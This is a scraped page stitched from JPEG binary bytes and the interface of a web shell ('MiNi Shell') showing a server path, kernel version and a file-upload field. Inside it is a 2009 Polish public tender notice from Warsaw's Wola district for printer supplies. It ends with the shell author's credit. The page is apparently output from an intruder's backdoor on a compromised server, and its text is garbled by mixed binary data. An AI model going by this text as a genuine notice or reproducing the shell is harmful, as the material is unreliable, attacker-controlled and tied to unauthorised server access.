JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090128/11112-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych dla Urzędu m.st. Warszawy Dzielnicy Wola.</b><br>
<b>Numer ogłoszenia: 11112 - 2009; data zamieszczenia: 28.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa, Dzielnica Wola , Al. Solidarności 90, 01-003 Warszawa, woj. mazowieckie, tel. 022 5048588, faks 022 5048592.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wola.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych dla Urzędu m.st. Warszawy Dzielnicy Wola..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia oraz wielkości lub zakres zamówienia: 
Przedmiotem zamówienie jest dostawa oryginalnych i fabrycznie nowych materiałów eksploatacyjnych do drukarek i urządzeń wielofunkcyjnych dla Urzędu m.st. Warszawy Dzielnicy Wola, Al. Solidarności 90 w Warszawie, zgodnie z Formularzem cenowym będącym załącznikiem do niniejszego opisu.
Koszty dostawy (załadunku, transportu do magazynu Zamawiającego na adres: Al. Solidarności 90, 01-003 Warszawa oraz rozładunku) obciążą Wykonawcę.

Wymagania jakościowe:
  1. Dostarczone materiały eksploatacyjne muszą być fabrycznie nowe, nie regenerowane, wolne od wad technicznych, kompletne i najwyższej jakości, nie mogą być ponownie napełniane. Muszą posiadać zgodne z właściwymi przepisami atesty. 
2. Materiały eksploatacyjne muszą być produktami oryginalnymi, w opakowaniach stosowanych typowo dla danego produktu przez producenta, zaopatrzonych w etykiety identyfikujące dany produkt i termin jego ważności, posiadające znak firmowy producenta, zalecanymi do stosowania przez producenta danego sprzętu lub akceptowanymi przez producenta sprzętu. Zamawiający przez materiały oryginalne rozumie materiały wyprodukowane przez producenta sprzętu lub producenta przez niego autoryzowanego.
UWAGA: Zamawiający dopuszcza składanie ofert równoważnych. W przypadku zaoferowania materiałów równoważnych Wykonawca, który został zwycięzcą licytacji elektronicznej ma obowiązek przekazać Zamawiającemu w ciągu 3 dni od zamknięcia licytacji pisemne zapewnienie (oświadczenie), iż ich zastosowanie nie spowoduje obniżenia jakości pracy danego urządzenia, że są to materiały o parametrach i właściwościach równych lub lepszych niż oryginalne ze znakiem firmowym producenta sprzętu, do którego są przeznaczone oraz, że zastosowanie tych materiałów nie spowoduje utraty gwarancji producenta udzielonej na te urządzenia.
W przypadku uszkodzenia urządzenia, którego przyczyną będzie użycie dostarczanych materiałów eksploatacyjnych równoważnych, innych niż zalecane przez producenta sprzętu, Wykonawca zobowiązany będzie do zwrotu kosztów naprawy urządzenia, a w przypadku takiej konieczności - zleconej przez Zamawiającego ekspertyzy niezależnego rzeczoznawcy.
Jeżeli w trakcie umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych produktów równoważnych niekorzystnie odbiega od parametrów produktu oryginalnego (zalecanych przez producenta urządzenia, do którego materiał jest kupowany) lub jeśli produkt nie sygnalizuje we właściwy sposób stanu zużycia tuszu lub tonera, Wykonawca na żądanie Zamawiającego winien oferowany materiał (w asortymencie, którego żądanie dotyczy) wymienić na materiał spełniający wymagania Zamawiającego (np. pochodzący lub zalecany przez producenta urządzenia, do którego materiał jest przeznaczony) bez zmiany ceny.
Przez materiały równoważne, wymienione w Opisie (dotyczy wkładów drukujących) Zamawiający rozumie materiały, których parametry fizyczne, techniczne, funkcjonalne i użytkowe (np. temperatura topnienia tonera, temperatura utrwalenia, pojemność tuszu/tonera, wydajność i jakość wydruku itp.) muszą być takie same lub lepsze od materiałów wskazanych w Opisie.
3. W związku z posiadaniem przez Zamawiającego urządzeń będących w okresie gwarancyjnym i wystąpieniem w kartach gwarancyjnych zapisów, które mówią o utracie gwarancji w przypadku stosowania innych materiałów niż zalecanych przez producenta danego sprzętu Zamawiający dopuszcza jedynie materiały wyprodukowane przez producenta sprzętu lub producenta przez niego autoryzowanego. 
 Szczegółowy zakres dostawy, rozwiązania materiałowe, jakościowe, warunki wykonania i odbiór dostawy określą załączniki do Opisu warunków uczestnictwa w licytacji:
1.wymagania jakościowe (opisane wyżej),
2.Formularz cenowy,
3.Wzór umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.21.13-6, 30.23.43.00-1.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz sposobu dokonania oceny spełnienia tych warunków.  
W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1.posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawa nakłada obowiązek posiadania takich uprawnień tj. Posiadają aktualny opis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej;
2.posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3.znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.nie podlega wykluczeniu z postępowania o udzielenie zamówienia w przypadkach wskazanych w art. 24 ustawy - Prawo zamówień publicznych. 
Złożenie przez Wykonawcę wraz z Wnioskiem o dopuszczenie do udziału w licytacji elektronicznej dokumentów i oświadczeń wymienionych w Opisie będzie stanowiło podstawę do oceny spełnienia warunków w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów czy Wykonawca spełnia wszystkie ww. warunki. 
Zamawiający wykluczy z postępowania Wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że dostarczone przez niego informacje istotne dla prowadzonego postępowania są nieprawdziwe.
Zamawiający dopuszcza do udziału w licytacji elektronicznej i zaprasza do składania ofert wszystkich Wykonawców spełniających warunki udziału w postępowaniu.
Zaproszenie zostanie wysłane drogą elektroniczną na  adres e-mail  wskazany we wniosku o dopuszczenie do udziału w licytacji elektronicznej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach lub dokumentach, jakie maja dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
Oświadczenia lub dokumenty powinny być oryginałami lub kserokopiami poświadczonymi za zgodność z oryginałem przez Wykonawcę.
Wykonawca zobowiązany jest złożyć Wniosek o dopuszczenie do udziału w licytacji elektronicznej składający się z:
1.wypełnionego formularza wniosku o dopuszczenie do udziału w licytacji elektronicznej o treści zgodnej z określoną we wzorze stanowiącym załącznik Nr 1 do Opisu.
2.informacji o częściach zamówienia powierzonych podwykonawcom - załącznik nr 2,
3.oświadczeń oraz dokumentów potwierdzających spełnienie warunków udziału w postępowaniu:
oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy - zgodnie z treścią wzoru stanowiącego załącznik Nr 3 do Opisu,
oświadczenie Wykonawcy o spełnieniu warunków wymienionych w art. 22 ust. 1 pkt. 1-4 ustawy, zgodnie z treścią wzoru załącznika Nr 4 do Opisu,
dokumenty potwierdzający dopuszczenie Wykonawcy do obrotu prawnego - aktualny opis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku,
4. pełnomocnictwo (w przypadku Wykonawców występujących wspólnie) do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://aukcje.um.warszawa.pl</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.wola.waw.pl</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Wymagania dotyczące rejestracji i identyfikacji wykonawców, w tym wymagania techniczne urządzeń informatycznych.
1.Wykonawca ma prawo złożyć tylko jeden wniosek o dopuszczenie do udziału w licytacji elektronicznej. Złożenie większej ilości wniosków spowoduje odrzucenie wszystkich wniosków złożonych przez danego Wykonawce.
2.Wnioski oraz wszystkie dokumenty wymagane w postępowaniu muszą spełniać następujące wymogi:
wniosek musi zostać sporządzony w języku polskim z zachowaniem formy pisemnej na maszynie do pisania, komputerze, ręcznie długopisem czytelnym pismem,
formularz wniosku i wszystkie załączane dokumenty sporządzone przez Wykonawcę muszą być podpisane; za podpisanie uznaje się własnoręczny podpis z pieczątką imienną przez osobę (-y) upoważnioną (-e) do reprezentowania zgodnie z formą reprezentacji Wykonawcy określoną w dokumencie rejestrowym lub innym dokumencie właściwym dla formy organizacyjnej,
w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do wniosku musi być 
załączone pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy. Pełnomocnictwo musi być złożone w oryginale lub notarialnie poświadczonej kopii,
pozostałe oświadczenia i dokumenty muszą być oryginałami lub kserokopiami poświadczonymi na każdej stronie za zgodność z oryginałem przez właściwą osobę, oraz muszą być sporządzone w języku polskim,
poprawki lub zmiany (również przy użyciu korektora) we wniosku, powinny być parafowane własnoręcznie przez osoby (-y) podpisującą (-e) wniosek,
dokumenty składające się na wniosek muszą być sporządzone wg wzorów i wymogów Opisu,
dokumenty sporządzone w języku obcym muszą być składane wraz z ich tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

Komputer użytkownika powinien spełniać następujące wymagania:

być wyposażony w procesor 733 MHz lub wyższy i posiadać co najmniej 512 MB pamięci RAM,
posiadać zainstalowany system operacyjny MS Windows XP lub wyższy,
posiadać zainstalowana przeglądarkę internetową IE w wersji 6.0 lub Mozilla,
posiadać podłączenie z siecią Internet o szybkości transmisji nie mniejszej niż 128 kb/s..</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> Sposób postępowania w toku licytacji elektronicznej, w szczególności określenie minimalnych wysokości postąpień:
Cena wywoławcza 54.250,00 PLN
Minimalna wysokość postąpień 150,00 PLN
Informacja o liczbie etatów licytacji elektronicznej i czasie ich trwania:
Liczba etapów: 1
Czas trwania 1 etapu w minutach: 20
Zamawiający zamyka licytację, gdy w podstawowym czasie nie zostanie złożona żadna oferta lub, gdy w ciągu 5 minut od złożenia oferty przez jednego z Wykonawców nie zostanie złożona żadna inna oferta, jednakże nie wcześniej niż po upływie 20 min od otwarcia licytacji.
Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:05.02.2009 r.
godz. 12.00.
Wniosek o dopuszczenie do udziału w licytacji elektronicznej należy oznaczyć tytułem postępowania oraz pieczęcią z nazwą Wykonawcy i złożyć w siedzibie Zamawiającego, Al.Solidarności 90, pok. 220, II p.
Termin składania wniosków upływa dnia 05.02.2009 r., o godz. 12.00..</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">20 min.</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> nie.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 05.02.2009 godzina 12:00, miejsce: w siedzibie Zamawiającego, Al.Solidarności 90, pok. 220, II p..</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> 12.02.2009 r., godz. 11.00,.</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> 12.02.2009, godz.11.20..</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> Zamawiający zamyka licytację gdy w podstawowym czasie nie zostanie złożona oferta lub gdy w ciągu 5 minut od odłożenia oferty przez jednego z Wykonawców nie zostanie złożona inna oferta, jednakże nie wcześniej niż po upływie 20 minut do otwarcia licytacji..</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com